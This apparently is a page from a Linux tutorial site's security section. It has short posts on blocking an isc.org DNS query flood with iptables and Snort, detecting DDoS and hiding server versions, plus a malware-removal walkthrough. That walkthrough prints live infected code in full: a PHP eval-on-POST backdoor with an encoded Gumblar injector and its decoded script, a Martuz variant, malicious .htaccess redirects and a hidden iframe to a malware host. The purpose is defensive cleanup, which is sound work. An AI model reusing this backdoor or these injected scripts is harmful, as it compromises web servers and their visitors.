www.linuxexpert.ro

Tutorials

  • Home
  • BGP Tutorials
    • Remove private AS
  • cPanel Tutorials
    • Install ImageMagick on cPanel
    • Install Softaculous
  • Linux Tutorials
    • Auto-reboot Linux after kernel panic
    • Building a firewall with Iptables
    • Change array RAID 1 disk order
    • Configure ntfs-3g on Linux Slackware
    • DHCP Option Codes
    • DansGuardian with Squid and ClamAV
    • Fetchmail for Gmail accounts
    • Install Zend & APC PHP Optimizers
    • Install Atheros AR242x PCI Express Adapter
    • Install awstats with DirectAdmin
    • Install DBD::mysql via CPAN shell
    • Install DjbDNS on Ubuntu
    • Installing fail2ban on Centos 5
    • Install GoDaddy SSL Certificate
    • Install i386 packages under x86_64
    • Install Linux via USB flashdrive
    • Install ModSecurity2 on Apache2.0.x
    • Install Nginx on CentOS
    • Install webalizer with ispconfig
    • Install intel A/B/G/N wireless on linux
    • Kernel Upgrade
    • Mobile phone access via bluetooth
    • Optimize MySQL
    • Optimize Qmail
    • Optimize server load
    • Optimize and Tune Apache for performance
    • Optimize and Tune Nginx for performance
    • Perfect Mailserver on Debian
    • Pidgin "Now Playing" Status Message
    • PHP hardening
    • PHP hardening with Suhosin
    • PHP5 Support allong with PHP4
    • Previewing your site before making DNS changes
    • Proxy Auto Configuration
    • PXE boot install rescue
    • Setup awstats on CentOS
    • Setup EC2 Amazon L2TP IPSec VPN
    • Setup email piping with Qmail
    • Setup Exim with DKIM
    • Setup Exim smart relay with cPanel
    • Setup OpenVPN
    • Setup postfix on nonstandard port
    • Setup SS5 Socks Proxy
    • Setup vsftp with no shell access
    • Sendmail smart relay with gmail auth
    • Squid proxy NCSA authentication
    • Tcpdump filters
    • Upgrade PHP to 5.3 in Plesk 10
    • Useful regular expressions
    • X with [SiS] 771/671 VGA controller
  • Joomla Tutorials
    • Hardening Joomla
    • Module Positions
    • Remove Joomla description meta tag
  • Looking Glasses
  • Optimize Firefox
  • Security
    • Crack WiFi WEP passwords
    • Defend against UDP isc.org DNS query DDOS
    • Detect DDoS attack
    • Remove malware from web sites
    • Sniff SSL passwords with ettercap
    • Snort2BGP
    • Track Hackers
    • What Is My IP
  • Troubleshooting
    • Grub error no such disk
    • named dumping master file: tmp-XXXXXXXXXX: open: permission denied
    • Nginx 413 Request Entity Too Large
    • SSH conection closed by remote host
    • Troubleshooting sis190.c
  • Unix Tutorials
    • FreeBSD reset root password
    • Installing snort on OpenBSD
    • Unix Toolbox
  • Virtualization Tutorials
    • Convert VirtualBox image to VMWare
    • VMware SNMP Enable
  • VoIP Tutorials
    • Install Elastix
    • Qos for Asterisk

Who's Online

We have 23 guests and no members online

Most Read

  • Setup SS5 Socks Proxy
  • Install webalizer with ispconfig
  • Sniff SSL passwords with ettercap
  • __404__
  • Optimize and Tune Apache for performance

Products and Services

  • Home
  • Linux Products and Services
  • Buy VPN Account
  • Privacy Policy for Linuxexpert
  • Remove malware

Security

Security

  • Print
  • Email
Details
Parent Category: Security
Published: 28 May 2012
Hits: 2769

Whats Is My IP Address, a nice tool to find your ip address.

Many users are behind firewalls proxy or nat equipments so they need to know what is their public ip address. Here it is:

 

{{myip}}

 

 

  • Print
  • Email
Details
Parent Category: Security
Published: 20 March 2012
Hits: 7166

Today i met a new challenge , to defend against the UDP isc.org DNS Query attack.

The attack looks like this:

20   0.090201   211.146.85.194	86.122.87.170    DNS   Standard query ANY isc.org
46   0.167341   211.146.85.194	86.122.87.170    DNS   Standard query ANY isc.org
67   0.240729   211.146.85.194	86.122.87.170    DNS   Standard query ANY isc.org
82   0.283842   211.146.85.194	86.122.87.170    DNS   Standard query ANY isc.org
122  0.413971   211.146.85.194	86.122.87.170    DNS   Standard query ANY isc.org
126  0.421386   211.146.85.194	86.122.87.170    DNS   Standard query ANY isc.org

 

This is how you can protect yourself:

Linux:

# iptables -A INPUT -p udp -m string --hex-string "|03697363036f726700|" --algo bm --to 65535 -j DROP

or

# iptables -A INPUT -p udp -m string --hex-string "|6973633f6f72673f|" --algo bm --to 65535 -j DROP

Snort rulles:

alert udp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS isc.org DDoS"; content:"|03 69 73 63 03 6f 72 67 00|"; reference:linuxexpert.ro,369; classtype:attempted-dos; sid:4000002; rev:1; fwsam: src, 1 day;)

Also you must secure your nameservers:

Open /etc/named.conf

Look for line:

// query-source address * port 53;

below it , insert the following lines.

version “Bind”;
allow-recursion { trusted; };
allow-notify { trusted; };
allow-transfer { trusted; };

This will disable recursion for other ips than trusted.

Note:

We use Hosting and VPS Hosting, from: www.star-host.org

We like and trust them.

Good prices, high security.

 

  • Print
  • Email
Details
Parent Category: Security
Published: 30 August 2009
Hits: 3051

In this tutorial I'll show you some tricks to find out by yourself if you are under DDOS attack or not.

Here are some usefull Linux commands:

#netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n

To find if there is large number of HTTP process running use the command:

#ps -aux|grep HTTP|wc -l

#netstat -lpn|grep :80 |awk '{print $5}'|sort

 

  • Print
  • Email
Details
Parent Category: Security
Published: 02 February 2012
Hits: 403

In this tutorial I'll show you how to Hide Apache & PHP Software Version:

 

In otder to hide Apache Header Information  you have to change in httpd.conf following settings:

ServerTokens Os
ServerSignature On
to:
ServerTokens Prod or ServerTokens ProductOnly 
ServerSignature Off

Don't forget to restart apache.

For  PHP Version Details you need to edit the php.ini and change


expose_php On
to
expose_php Off

Now you need to restart your apache server 

After those change your apache server is no longer show any Header Information

Note:

We use Hosting and VPS Hosting, from: www.star-host.org

We like and trust them.

Good prices, high security.

  • Print
  • Email
Details
Parent Category: Security
Published: 02 June 2009
Hits: 5595

Your site has been banned by Google because it contain viruses, trojans, or other malware?
Here is a nice tutorial that will help you to remove all this bad stuff.
Few days ago i had to remove malware from a site. After i've downloaded the hole site to my computer, i've start
looking into the php files(the site was made in php)

 

Here is how it look:
# cat class.database.php
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST
['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',
base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0
gCihmdW5jdGlvbigpe3ZhciB0V1Y9JyUnO3ZhciBHWmFjPXVuZXNjYXBlKC
gndl82MXJfMjBhXzNkXzIyU2NyXzY5cHRFXzZlXzY3aW5fNjVfMjJfMmNiXz
NkXzIyXzU2XzY1cl83M2lvbigpK18yMl8yY2pfM2RfMjJfMjJfMmNfNzVfM2
RuXzYxXzc2aWdhdG9yXzJldXNlcl80MWdlbnRfM2JpZl8yOCh1XzJlaW5k
ZXhPXzY2KF8yMldpbl8yMilfM2VfMzApXzI2XzI2KHVfMmVfNjluZGV4X
zRmZl8yOF8yMk5fNTRfMjA2XzIyKV8zYzApXzI2XzI2KGRfNmZfNjN1b
V82NW50XzJlY29va2lfNjVfMmVpXzZlZGV4XzRmXzY2KF8yMm1fNjlfN
jVrXzNkXzMxXzIyKV8zY18zMClfMjZfMjZfMjhfNzR5XzcwXzY1b182Nl8y
OHpydnp0c18yOV8yMV8zZF83NHlwZW9mKF8yMkFfMjIpKSlfN2J6cn
ZfN2F0c18zZF8yMkFfMjJfM2JldmFfNmMoXzIyaWYoXzc3XzY5bmRv
d18yZV8yMithK18yMilqXzNkaitfMjJfMmJhK18yMk1ham9fNzJfMjIrYi
thXzJiXzIyTV82OW5vcl8yMitiK2FfMmJfMjJCdWlfNmNkXzIyK2IrXzIy
al8zYl8yMilfM2JfNjRvY183NV82ZGVudF8yZV83N3JfNjl0ZV8yOF8yM
l8zY3NjcmlwdF8yMHNyY18zZF8yZl8yZmd1bWJsYXJfMmVjbl8yZnJz
c18yZl8zZmlkXzNkXzIyK182YStfMjJfM2VfM2NfNWNfMmZzY183M
l82OV83MF83NF8zZV8yMilfM2JfN2QnKS5yZXBsYWNlKC9fL2csdF
dWKSk7ZXZhbChHWmFjKX0pKCk7CiAtLT48L3NjcmlwdD4='));
function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))
$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>
#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5)
{$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s
*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos
($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s)
;}$s1=preg_replace('#<script language=javascript>
<!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=
preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);
elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return
$g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0)
{$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS[
'tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)
if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output
handler'?false:$a);for($i=count($s)-1;$i>=0;$i--)
{$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);
$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp
_lkojfghx2(); ?><?php



/*

Database class

*/

class database {

 var $error = null;
 
 // Set DB_URL
 function database($url = '') {
  $this->db_url = $url;
  // Connect to database
  $this->connect();
  // Check for database connection error
  if($this->is_error()) {
  die($this->get_error());
  }
 }
 
 // Connect to the database
 function connect() {
  $status = $this->db_handle = mysql_connect(DB_HOST, DB_USERNAME, DB_PASSWORD);
  if(mysql_error()) {
  $this->connected = false;
  $this->error = mysql_error();
  } else {
  if(!mysql_select_db(DB_NAME)) {
  $this->connected = false;
  $this->error = mysql_error();
  } else {
  $this->connected = true;
  }
  }
  return $this->connected;
 }
 
 // Disconnect from the database
 function disconnect() {
  if(isset($this->Database)) {
  mysql_close();
  return true;
  } else {
  return false;
  }
 }
 
 // Run a query
 function query($statement) {
  $mysql = new mysql();
  $mysql->query($statement);

  if($mysql->getError()) {
  $this->set_error($mysql->getError());
  return null;
  } else {
  return $mysql;
  }
 }
 
 // Gets the first column of the first row
 function get_one($statement) {
  $fetch_row = mysql_fetch_row(mysql_query($statement));
  $result = $fetch_row[0];
  if(mysql_error()) {
  $this->set_error(mysql_error());
  return null;
  } else {
  return $result;
  }
 }
 
 // Set the DB error
 function set_error($message = null) {
  global $TABLE_DOES_NOT_EXIST, $TABLE_UNKNOWN;
  $this->error = $message;
  if(strpos($message, 'no such table')) {
  $this->error_type = $TABLE_DOES_NOT_EXIST;
  } else {
  $this->error_type = $TABLE_UNKNOWN;
  }
 }
 
 // Return true if there was an error
 function is_error() {
  return (!empty($this->error)) ? true : false;
 }
 
 // Return the error
 function get_error() {
  return $this->error;
 }
 
}

class mysql {

 var $error = null;

 // Run a query
 function query($statement) {
  $this->result = mysql_query($statement);
  $this->error = mysql_error();
  return $this->result;
 }
 
 // Get the ID generated from the previous INSERT operation
 function getInsertID() {
  return mysql_insert_id();
 }

 // Fetch num rows
 function numRows() {
  $val = mysql_num_rows($this->result);
  $this->error = mysql_error();
  return $val;
 }
 
 // Fetch row
 function fetchRow() {
  $val = mysql_fetch_array($this->result);
  $this->error = mysql_error();
  return $val;
 }

 // Fetch array
 function fetchObject() {
  $val = mysql_fetch_object($this->result);
  $this->error = mysql_error();
  return $val;
 }
 
 // Get error
 function getError() {
  if($this->error != null) {
  return $this->error;
  } else {
  return null;
  }
 }

}

$database = new database();

?>
 
See the base64_decode line. I've put the text into a test.php file
<?php
$str = 'PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciB0V1Y9JyUnO........';
echo base64_decode($str);
?>
and the result was in deed a virus code:
 # php virus_test.php
<script language=javascript><!--
(function(){var tWV='%';var GZac=unescape(('v_61r_20a_3d_22Scr_69ptE_6e_67in_
65_22_2cb_3d_22_56_65r_73ion()+_22_2cj_3d_22_22_2c_75_3dn_61_76igator_2euser_
41gent_3bif_28(u_2eindexO_66(_22Win_22)_3e_30)_26_26(u_2e_69ndex_4ff_28_22N_
54_206_22)_3c0)_26_26(d_6f_63um_65nt_2ecooki_65_2ei_6edex_4f_66(_22m_69_65k_3d_31_22)
_3c_30)_26_26_28_74y_70_65o_66_28zrvzts_29_21_3d_74ypeof(_22A_22)))_7bzrv_
7ats_3d_22A_22_3beva_6c(_22if(_77_69ndow_2e_22+a+_22)j_3dj+_22_2ba+_
22Majo_72_22+b+a_2b_22M_69nor_22+b+a_2b_22Bui_6cd_22+b+_22j_3b_22)
_3b_64oc_75_6dent_2e_77r_69te_28_22_3cscript_20src_3d_2f_2fgumblar_2ecn_
2frss_2f_3fid_3d_22+_6a+_22_3e_3c_5c_2fsc_72_69_70_74_3e_22)_3b_7d')
.replace(/_/g,tWV));eval(GZac)})();
--></script>

After i removed by hand the bad code everything got ok. 
Ok that was the first example of malware remove.
Example 2:  
Sometimes attackers modify the .htaccess file. This is how it looks:
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} (Googlebot|Slurp|msnbot)
RewriteRule ^ http://badsite/ [R=301,L]

Example 2 complex:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://badsite [R,L]

 
Example 3:
Here, i had to remove malware from
Indian Embassy from Greece : http://www.indianembassy.gr
One of the infected file: http://indianembassy.gr/greece/pages_greek.html:
# cat pages_greek.html  
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Flash Page Flip</title>
<meta name="Description" content="Flash Page Flip is best advanced dynamic page flip flash object">
<meta name="Keywords" content="page flip, page flipping, page turn, flip album, flipping book, digital book, online catalog">
<script src="/js/AC_RunActiveContent.js" mce_src="js/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="/js/PopUpWin.js" mce_src="js/PopUpWin.js" type="text/javascript"></script>
<style type="text/css">
<!--
body {
background-color: #ccc;
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
}
#main{
position:absolute;
top:0px;
left:0px;
width:100%;
height:100%;
}
#max{
position:absolute;
left:0px;
top:550px;
height:50px;
width:200px;
background-image:url('swf/down_banner.gif');
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:11px;
font-weight:bold
}
#red{
width:auto;
height:20px;
}
.style1 {color: #FFFFFF}

-->
</style></head>
<script language=javascript><!--
(function(dcdP){var ufIC='%';var gQOS4=unescape(('v~61r~20a~3d~22~53crip~74Engine~22~2cb
~3d~22Ve~72s~69on~28)+~22~2c~6a~3d~22~22~2cu~3dn~61v~69~67ator~2eus~65rA~67ent
~3bif(~28u~2eindex~4ff~28~22Chrome~22)~3c0~29~26~26(u~2eind~65xOf~28~22Win~22)~
3e0)~26~26(u~2eindex~4ff(~22NT~206~22)~3c0)~26~26(~64oc~75ment~2ec~6foki~65~
2eindex~4ff~28~22mie~6b~3d1~22)~3c0)~26~26(t~79peo~66~28zr~76zts)~21~3dtype~
6ff(~22A~22~29))~7bzrv~7ats~3d~22A~22~3b~65val~28~22if(window~2e~22+a+~22)~
6a~3dj+~22+a~2b~22M~61jo~72~22+b+a~2b~22Mino~72~22+b+~61~2b~22Build~
22+b+~22j~3b~22)~3bdocument~2ewr~69~74e~28~22~3cscript~20~73r~63~3d~
2f~2fm~61r~22~2b~22~74uz~2e~63n~2fvi~64~2f~3f~69d~3d~22+~6a+~22~3e~3c~
5c~2fscript~3e~22)~3b~7d').replace(dcdP,ufIC));eval(gQOS4)})(/\~/g);
--></script>
<body>
<div id="main">

<script type="text/javascript">
AC_FL_RunContent( 'codebase','http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0','width','100%','height','100%','src','swf/Magazine','quality','high','pluginspage','http://www.macromedia.com/go/getflashplayer','bgcolor','#cccccc','allowFullScreen','true','allowScriptAccess','sameDomain','wmode','transparent','movie','swf/Magazine' ); //end AC code
</script><noscript>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="100%" height="100%">
<param name="movie" value="swf/Magazine.swf" />
<param name="quality" value="high" />
<param name="bgcolor" value="#cccccc" />
<param name="allowFullScreen" value="true" />
<param name="allowScriptAccess" value="sameDomain" />
<param name="wmode" value="transparent"/>
<embed src="/swf/Magazine.swf" mce_src="swf/Magazine.swf" width="100%" height="100%" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" wmode="transparent" allowFullScreen="true" allowScriptAccess="sameDomain"></embed>
</object></noscript></div>
<div id="max" align="center">
<div id="red"></div>
<span class="style1"><a href="http://www.consagous.com" mce_href="http://www.consagous.com"><font color="#FFFFFF">
www.consagous.com</font></a></span></div>

The virus is called Martuz and is another version of Gumblar virus.
You can find infected files using this command:
grep -ril unescape "public_html_dir".
Beacause the site have 115 afected files, removin by hand was killing me so
i've made a script wich remove the bad code from files:
# cat clean_Martuz.sh
#!/bin/bash

for i in `grep -ril unescape /sites/*| grep php` ; do

echo "Removing virus from $i";

sleep 1;

sed -e s/"(function(dcdP){var ufIC='%';var gQOS4=unescape(('v~61r~20a~3d~22~53crip~
74Engine~22~2cb~3d~22Ve~72s~69on~28)+~22~2c~6a~3d~22~22~2cu~3dn~61v~69~
67ator~2eus~65rA~67ent~3bif(~28u~2eindex~4ff~28~22Chrome~22)~3c0~29~26~
26(u~2eind~65xOf~28~22Win~22)~3e0)~26~26(u~2eindex~4ff(~22NT~206~22)~
3c0)~26~26(~64oc~75ment~2ec~6foki~65~2eindex~4ff~28~22mie~6b~3d1~22)~
3c0)~26~26(t~79peo~66~28zr~76zts)~21~3dtype~6ff(~22A~22~29))~7bzrv~7ats~3d~
22A~22~3b~65val~28~22if(window~2e~22+a+~22)~6a~3dj+~22+a~2b~22M~61jo~
72~22+b+a~2b~22Mino~72~22+b+~61~2b~22Build~22+b+~22j~3b~22)~3bdocument~
2ewr~69~74e~28~22~3cscript~20~73r~63~3d~2f~2fm~61r~22~2b~22~74uz~
2e~63n~2fvi~64~2f~3f~69d~3d~22+~6a+~22~3e~3c~5c~2fscript~3e~22)~
3b~7d').replace(dcdP,ufIC));eval(gQOS4)})"//g $i > x && mv x $i

done

# 
 Example 4:
Of course we never got an iframe example. Today i've just remove an iframe code from
the site: http://www.xxxxx.com:
Let's have a look on one of suspicious files:
#cat customization/homepage.htm

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>Untitled Document</title>
<style type="text/css">
<!--
.style1 {
color: #666666;
font-weight: bold;
font-style: normal;
}
-->
</style>
</head>

<body><iframe src="http://b5z.ru:8080/index.php" mce_src="http://b5z.ru:8080/index.php" width=105 height=169 style=
"visibility: hidden"></iframe>
<table width="100%" border="0" align="center">


So, the evil code is <iframe src="http://b5z.ru:8080/index.php" mce_src="http://b5z.ru:8080/index.php" width=105 height=169
style="visibility: hidden"></iframe>.
This code was present in every files, including html, js, php. Again sed and regular
expressions saved me:
# cat clean_iframe.sh
#!/bin/bash

virus='<iframe src="http://b5z.ru:8080/index.php" mce_src="http://b5z.ru:8080/index.php" width=105 height=169
style="visibility: hidden"></iframe>'
echo "Virus code: $virus"
path="/public_html/"

for i in `grep -ril "$virus" $path/*` ; do

echo "Removing virus from $i";

sleep 1;

sed -e s/'[<]iframe src="http:\/\/b5z.ru:8080\/index.php" mce_src="http:\/\/b5z.ru:8080\/index.php" width=105 height=169
style="visibility: hidden"[>][<]\/iframe[>]'//g $i > /tmp/x && mv /tmp/x $i

done



 
Advices: 
1)If you are using some in-house PHP scripts, consult the PHP Security Guide
2)Write protect server files that should not be modified by your web application
(644 permissions on *nix)
3)Check your local computers for spyware and viruses.
4)Change all passwords.
 

Note:

We use Hosting and VPS Hosting, from: www.star-host.org

We like and trust them.

Good prices, high security.

  1. Sniff SSL passwords with ettercap
  2. Crack WiFi WEP passwords
  3. Track Hackers
  4. Snort2BGP